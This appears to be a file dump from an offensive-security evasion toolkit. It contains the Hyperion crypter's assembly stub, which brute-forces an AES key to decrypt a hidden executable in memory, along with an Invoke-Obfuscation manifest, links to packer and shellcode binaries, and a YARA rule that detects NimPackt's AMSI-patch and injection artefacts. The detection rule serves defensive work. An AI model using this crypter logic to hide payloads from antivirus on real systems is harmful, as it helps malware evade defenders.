        ROW_SIZE = 8
        ENCRYPTION_ROUNDS = 14
end if

;size of the sbox
SBOX_SIZE equ 256

;size of the rcon table
RCON_SIZE equ 256

;size of the Galois multiplication
;lookup tables
GALOIS_SIZE equ 256
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/64/decryptexecutable.asm:
--------------------------------------------------------------------------------
1 | ;Decrypt the exe which is stored in input_image (in place, trying keys until the checksum matches)
2 | proc decryptExecutable uses rsi rdi, input_image:QWORD
3 | ;in: rcx = address of the encrypted image; out: rax = 1 on success, 0 on error
4 | local str1[256]:BYTE, ret_val:QWORD,\
5 | key[KEY_SIZE]:BYTE, encrypted_backup:QWORD
6 | ;NOTE(review): ret_val is declared but never referenced in this proc
7 | mov [input_image],rcx ;store the register argument in its stack slot
8 | ;NOTE(review): no key is passed in; it is found by exhaustive search below, so this layer is obfuscation rather than a secret and the same search recovers the payload for analysis
9 | writeWithNewLine createStringBruteforcing, str1, dec_exit_success ;macro defined elsewhere; NOTE(review): confirm what it does with the dec_exit_success label
10 | ;init key: zero all KEY_SIZE bytes, the starting point of the search
11 | lea rdi,[key]
12 | mov rcx, KEY_SIZE
13 | mov al,0
14 | dec_init_key:
15 | mov [rdi],al
16 | inc rdi
17 | dec rcx
18 | jnz dec_init_key
19 |
20 | ;create a copy of the encrypted file
21 | ;which is used to brute force the key
22 | invoke VirtualAlloc, 0, INFILE_SIZE, MEM_COMMIT+MEM_RESERVE, PAGE_READWRITE ;backup buffer is read/write, not executable
23 | test rax, rax
24 | jz dec_exit_error ;allocation failed
25 | mov [encrypted_backup],rax
26 | ;now copy the file into the buffer
27 | mov rdi,rax
28 | mov rsi,[input_image]
29 | mov rcx,INFILE_SIZE
30 | ;we can mov qwords because buffer is a multiple of 16
31 | shr rcx,3 ;byte count -> qword count; a remainder below 8 bytes would be dropped
32 | repz movsq ;NOTE(review): relies on the direction flag being clear
33 | ;each round: decrypt with the candidate key, check the result, on failure restore the ciphertext from the backup
34 | keyspace_loop:
35 | lea rax,[key]
36 | fastcall decAES, INFILE_SIZE, [input_image], [input_image], rax ;both buffer arguments are input_image, i.e. in place
37 | fastcall verifyChecksum, [input_image], INFILE_SIZE
38 | test rax,rax
39 | jnz dec_decrypted_success ;non-zero result: checksum accepted, key found
40 |
41 | ;restore the encrypted version to try the next key
42 | mov rsi,[encrypted_backup]
43 | mov rdi,[input_image]
44 | mov rcx,INFILE_SIZE
45 | shr rcx,3
46 | repz movsq
47 | ;lea eax,[key]
48 | ;stdcall encAES, [section_size], [section_address], [section_address], eax
49 |
50 | ;next key
51 | lea rax,[key]
52 | fastcall nextKey, rax
53 | test rax,rax
54 | jz dec_exit_error ;nextKey returned 0; NOTE(review): encrypted_backup is not released on this path
55 | ;abort if key space was explored, else continue
56 | jmp keyspace_loop
57 |
58 | dec_decrypted_success:
59 | invoke VirtualFree, [encrypted_backup], 0, MEM_RELEASE
60 | test rax, rax
61 | jz dec_exit_error ;NOTE(review): a failed VirtualFree is reported as an error although the image is already decrypted
62 |
63 | dec_exit_success:
64 | mov rax,1
65 | jmp dec_exit_ret
66 |
67 | dec_exit_error:
68 | sub rax,rax ;rax = 0
69 |
70 | dec_exit_ret:
71 | ret
72 |
73 | endp
74 |
75 | ;generate next decryption key: the first REAL_KEY_SIZE bytes are stepped like a counter, lowest address first
76 | proc nextKey key_ptr:QWORD
77 | ;in: rcx = key buffer; out: rax = 1 if a new key was produced, 0 once every searched byte has wrapped
78 | mov [key_ptr],rcx
79 | ;NOTE(review): REAL_KEY_SIZE and REAL_KEY_RANGE are defined outside this listing; the search covers REAL_KEY_RANGE^REAL_KEY_SIZE keys and bytes past REAL_KEY_SIZE are never written here
80 | mov rax,[key_ptr]
81 | mov r10,rax
82 | add r10,REAL_KEY_SIZE ;r10 = one past the last searched key byte
83 | nkey_next_element:
84 | inc byte [rax]
85 | cmp byte [rax],REAL_KEY_RANGE ;each searched byte takes the values 0..REAL_KEY_RANGE-1
86 | jne nkey_not_finished
87 | mov byte [rax],0 ;byte wrapped: reset it and carry into the next one
88 | inc rax
89 | cmp rax,r10
90 | je nkey_finished ;carry ran past the last searched byte: key space exhausted
91 | jmp nkey_next_element
92 |
93 | nkey_not_finished:
94 | mov rax,1
95 | ret
96 |
97 | nkey_finished:
98 | sub rax,rax ;rax = 0
99 | ret
100 |
101 | endp;
102 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/64/license.txt:
--------------------------------------------------------------------------------
1 | Copyright (c) 2019, FasmAES by Christian Ammann
2 | All rights reserved.
3 |
4 | Redistribution and use in source and binary forms, with or without
5 | modification, are permitted provided that the following conditions are met:
6 |
7 | 1. Redistributions of source code must retain the above copyright notice, this
8 | list of conditions and the following disclaimer.
9 | 2. Redistributions in binary form must reproduce the above copyright notice,
10 | this list of conditions and the following disclaimer in the documentation
11 | and/or other materials provided with the distribution.
12 |
13 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
14 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
15 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
16 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
17 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
18 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
19 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
20 | ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
21 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
22 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
23 |
24 | The views and conclusions contained in the software and documentation are those
25 | of the authors and should not be interpreted as representing official policies,
26 | either expressed or implied, of the Nullsecurity Project.
27 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/64/rcon.asm:
--------------------------------------------------------------------------------
1 | ;loads the rcon into memory. idea behind this implementation:
2 | ;add garbage code, split up array into sub-arrays, reverse order, etc.
3 | ;to hide rcon where it's necessary
4 | proc createRcon uses rsi rdi, rcon_ptr:QWORD
5 | mov [rcon_ptr],rcx
6 | ;NOTE(review): none of the hiding steps named above appear here; the table below is one contiguous array copied as-is, so the Rcon byte sequence is present verbatim in the assembled output
7 | mov rdi,[rcon_ptr] ;destination: caller's buffer, RCON_SIZE bytes are written to it
8 | mov rsi,rcon_array
9 | mov rcx,RCON_SIZE
10 | repz movsb ;byte copy; relies on the direction flag being clear
11 | ret
12 | ;table data sits after ret inside the proc: 16 rows of 16 bytes
13 | rcon_array db 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a,\
14 | 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39,\
15 | 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a,\
16 | 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,\
17 | 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef,\
18 | 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc,\
19 | 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b,\
20 | 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3,\
21 | 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94,\
22 | 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20,\
23 | 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35,\
24 | 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f,\
25 | 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04,\
26 | 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63,\
27 | 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd,\
28 | 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d
29 |
30 | endp
31 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/c/aes.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Payloads/Aes/c/aes.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/c/unlicense.txt:
--------------------------------------------------------------------------------
1 | This is free and unencumbered software released into the public domain.
2 |
3 | Anyone is free to copy, modify, publish, use, compile, sell, or
4 | distribute this software, either in source code form or as a compiled
5 | binary, for any purpose, commercial or non-commercial, and by any
6 | means.
7 |
8 | In jurisdictions that recognize copyright laws, the author or authors
9 | of this software dedicate any and all copyright interest in the
10 | software to the public domain. We make this dedication for the benefit
11 | of the public at large and to the detriment of our heirs and
12 | successors. We intend this dedication to be an overt act of
13 | relinquishment in perpetuity of all present and future rights to this
14 | software under copyright law.
15 |
16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
17 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
18 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
19 | IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
20 | OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
21 | ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
22 | OTHER DEALINGS IN THE SOFTWARE.
23 |
24 | For more information, please refer to <http://unlicense.org/>
25 |
--------------------------------------------------------------------------------
/contrib/Hyperion/hyperion.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/hyperion.exe
--------------------------------------------------------------------------------
/contrib/Hyperion/license.txt:
--------------------------------------------------------------------------------
1 | Copyright (c) 2020, Hyperion Runtime Crypter by Christian Ammann
2 | All rights reserved.
3 |
4 | Redistribution and use in source and binary forms, with or without
5 | modification, are permitted provided that the following conditions are met:
6 |
7 | 1. Redistributions of source code must retain the above copyright notice, this
8 | list of conditions and the following disclaimer.
9 | 2. Redistributions in binary form must reproduce the above copyright notice,
10 | this list of conditions and the following disclaimer in the documentation
11 | and/or other materials provided with the distribution.
12 |
13 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
14 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
15 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
16 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
17 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
18 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
19 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
20 | ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
21 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
22 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
23 |
24 | The views and conclusions contained in the software and documentation are those
25 | of the authors and should not be interpreted as representing official policies,
26 | either expressed or implied, of the Nullsecurity Project.
27 |
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Invoke-Obfuscation.psd1:
--------------------------------------------------------------------------------
1 | # This file is part of Invoke-Obfuscation.
2 | #
3 | # Copyright 2017 Daniel Bohannon <@danielhbohannon>
4 | # while at Mandiant
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 |
18 |
19 |
20 | #
21 | # Module manifest for module 'Invoke-Obfuscation'
22 | #
23 | # Generated by: Daniel Bohannon (@danielhbohannon)
24 | #
25 | # Generated on: 2017-01-19
26 | #
27 |
28 |
29 |
30 | @{
31 |
32 | # Version number of this module.
33 | ModuleVersion = '1.1'
34 |
35 | # ID used to uniquely identify this module
36 | GUID = 'd0a9150d-b6a4-4b17-a325-e3a24fed0aa9'
37 |
38 | # Author of this module
39 | Author = 'Daniel Bohannon (@danielhbohannon)'
40 |
41 | # Copyright statement for this module
42 | Copyright = 'Apache License, Version 2.0'
43 |
44 | # Description of the functionality provided by this module
45 | Description = 'PowerShell module file for importing all required modules for the Invoke-Obfuscation framework.'
46 |
47 | # Minimum version of the Windows PowerShell engine required by this module
48 | PowerShellVersion = '2.0'
49 |
50 | # Minimum version of the Windows PowerShell host required by this module
51 | PowerShellHostVersion = '2.0'
52 |
53 | # Script files (.ps1) that are run in the caller's environment prior to importing this module
54 | ScriptsToProcess = @('Out-ObfuscatedTokenCommand.ps1','Out-ObfuscatedAst.ps1','Out-ObfuscatedStringCommand.ps1','Out-EncodedAsciiCommand.ps1','Out-EncodedHexCommand.ps1','Out-EncodedOctalCommand.ps1','Out-EncodedBinaryCommand.ps1','Out-SecureStringCommand.ps1','Out-EncodedBXORCommand.ps1','Out-EncodedSpecialCharOnlyCommand.ps1','Out-EncodedWhitespaceCommand.ps1','Out-CompressedCommand.ps1','Out-PowerShellLauncher.ps1','Invoke-Obfuscation.ps1')
55 | # NOTE(review): Out-ObfuscatedAst.ps1 is named above but is not among the files listed for this directory - confirm it ships with the module
56 | # Functions to export from this module
57 | FunctionsToExport = '*'
58 | # NOTE(review): this manifest has no RootModule or NestedModules key; everything is loaded through ScriptsToProcess
59 | # HelpInfo URI of this module
60 | # HelpInfoURI = ''
61 |
62 | }
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-CompressedCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-CompressedCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-EncodedAsciiCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-EncodedAsciiCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-EncodedBXORCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-EncodedBXORCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-EncodedBinaryCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-EncodedBinaryCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-EncodedHexCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-EncodedHexCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-EncodedOctalCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-EncodedOctalCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-EncodedSpecialCharOnlyCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-EncodedSpecialCharOnlyCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-EncodedWhitespaceCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-EncodedWhitespaceCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-ObfuscatedStringCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-ObfuscatedStringCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-ObfuscatedTokenCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-ObfuscatedTokenCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-PowerShellLauncher.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-PowerShellLauncher.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-SecureStringCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-SecureStringCommand.ps1
--------------------------------------------------------------------------------
/contrib/LoGIC.NET/LoGiC.NET.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/LoGIC.NET/LoGiC.NET.exe
--------------------------------------------------------------------------------
/contrib/LoGIC.NET/LoGiC.NET.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/contrib/LoGIC.NET/SharpConfigParser.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/LoGIC.NET/SharpConfigParser.dll
--------------------------------------------------------------------------------
/contrib/LoGIC.NET/dnlib.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/LoGIC.NET/dnlib.dll
--------------------------------------------------------------------------------
/contrib/MPRESS/BugReport.txt:
--------------------------------------------------------------------------------
1 |
2 | MATCODE Compressor
3 | ~~~~~~~~~~~~~~~~~~
4 | Reporting Problems and Receiving Support
5 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
6 |
7 | At first make sure that the problem you have encountered while packing
8 | or executing compressed application is not an ordinary situation or a known
9 | problem: see MPRESS ReadMe, TechInfo. Only if the problem is not known, send
10 | an email to ve@matcode.com, otherwise there's no need to produce extra
11 | traffic, it does not stimulate developers in any way.
12 | In your email specify the conditions to reproduce the problem:
13 | what file caused the problem (where to get it). You should attach
14 | the file to your message, only if the file size does not exceed 400k.
15 | A general notice concerning files attached - it is specific to the
16 | mailserver that any files attached with .exe, .dll, .sys, .ocx, .cpl,
17 | .scr, ... etc. executable extensions are removed. So, before sending
18 | such files to matcode.com, you should archive them first.
19 |
20 | MATCODE Software,
21 | info@matcode.com
22 |
23 |
--------------------------------------------------------------------------------
/contrib/MPRESS/license.txt:
--------------------------------------------------------------------------------
1 |
2 | MPRESS Matcode comPRESSor
3 | Copyright (c) 2007-2009, Vitaly Evseenko, MATCODE Software
4 | All rights reserved.
5 |
6 | This program is free for commercial and non-commercial use as long as
7 | the following conditions are aheared to.
8 |
9 | Copyright remains Vitaly Evseenko (MATCODE Software), and as such any
10 | Copyright notices in the code are not to be removed.
11 |
12 | Redistribution and use, without modification, is permitted and reproduce
13 | the above copyright notice and the following disclaimer in the
14 | documentation and/or other materials provided with the distribution.
15 |
16 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
17 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
18 | TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
19 | PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR
20 | CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
21 | EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
22 | PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
23 | PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
24 | LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
25 | NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
26 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
27 |
28 | The licence and distribution terms for any publically available
29 | version of this program cannot be changed. i.e. this program
30 | cannot simply be copied and put under another distribution licence
31 |
--------------------------------------------------------------------------------
/contrib/MPRESS/mpress.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/MPRESS/mpress.exe
--------------------------------------------------------------------------------
/contrib/Mangle/Mangle.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Mangle/Mangle.exe
--------------------------------------------------------------------------------
/contrib/Mangle/sigcheck.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Mangle/sigcheck.exe
--------------------------------------------------------------------------------
/contrib/Mangle/signed-executables/WINWORD.EXE:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Mangle/signed-executables/WINWORD.EXE
--------------------------------------------------------------------------------
/contrib/Mangle/signed-executables/autorunsc64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Mangle/signed-executables/autorunsc64.exe
--------------------------------------------------------------------------------
/contrib/Mangle/signed-executables/notepad.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Mangle/signed-executables/notepad.exe
--------------------------------------------------------------------------------
/contrib/Mangle/signed-executables/svchost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Mangle/signed-executables/svchost.exe
--------------------------------------------------------------------------------
/contrib/NimPackt-v1/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2022 Cas van Cooten (@chvancooten)
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
--------------------------------------------------------------------------------
/contrib/NimPackt-v1/NimPackt.yar:
--------------------------------------------------------------------------------
1 | rule HKTL_Nim_NimPackt : EXE FILE HKTL
2 | {
3 | meta:
4 | description = "Detects binaries generated with NimPackt v1"
5 | author = "Cas van Cooten"
6 | reference = "https://github.com/chvancooten/NimPackt-v1"
7 | date = "2022-01-26"
8 | // Strings: two Nim markers ($nim*), the tool name ($np1) and three loader artefacts ($sus*).
9 | strings:
10 | $nim1 = "fatal.nim" ascii fullword
11 | $nim2 = "winim" ascii
12 | $np1 = { 4E 69 6D 50 61 63 6B 74 } // ASCII "NimPackt"
13 | $sus1 = { 61 6D 73 69 00 00 00 00 B8 57 00 07 80 C3 } // "amsi" + four NUL bytes, then x86 mov eax,0x80070057 / ret (0x80070057 is the E_INVALIDARG HRESULT)
14 | $sus2 = { 5B 2B 5D 20 49 6E 6A 65 63 74 65 64 } // ASCII "[+] Injected"
15 | $sus3 = { 5C 2D 2D 20 62 79 74 65 73 20 77 72 69 74 74 65 6E 3A } // ASCII "\-- bytes written:"
16 | // Match: MZ file under 750KB with a Nim marker and either the tool name or two of the loader artefacts.
17 | condition:
18 | uint16(0) == 0x5A4D and // "MZ" at offset 0
19 | filesize < 750KB and // NOTE(review): files of 750KB or more are never evaluated, so a miss is inconclusive
20 | 1 of ($nim*) and (
21 | $np1 or 2 of ($sus*)
22 | )
23 | }
24 |
--------------------------------------------------------------------------------
/contrib/NimPackt-v1/assets/AntiScan-Results-CSBeacon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/NimPackt-v1/assets/AntiScan-Results-CSBeacon.png
--------------------------------------------------------------------------------
/contrib/NimPackt-v1/assets/Nimpackt-Logo-Blacktext.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/NimPackt-v1/assets/Nimpackt-Logo-Blacktext.png
--------------------------------------------------------------------------------
/contrib/NimPackt-v1/assets/cna_plugin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/NimPackt-v1/assets/cna_plugin.png
--------------------------------------------------------------------------------
/contrib/NimPackt-v1/dist/shellycoat_x64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/NimPackt-v1/dist/shellycoat_x64.bin
--------------------------------------------------------------------------------
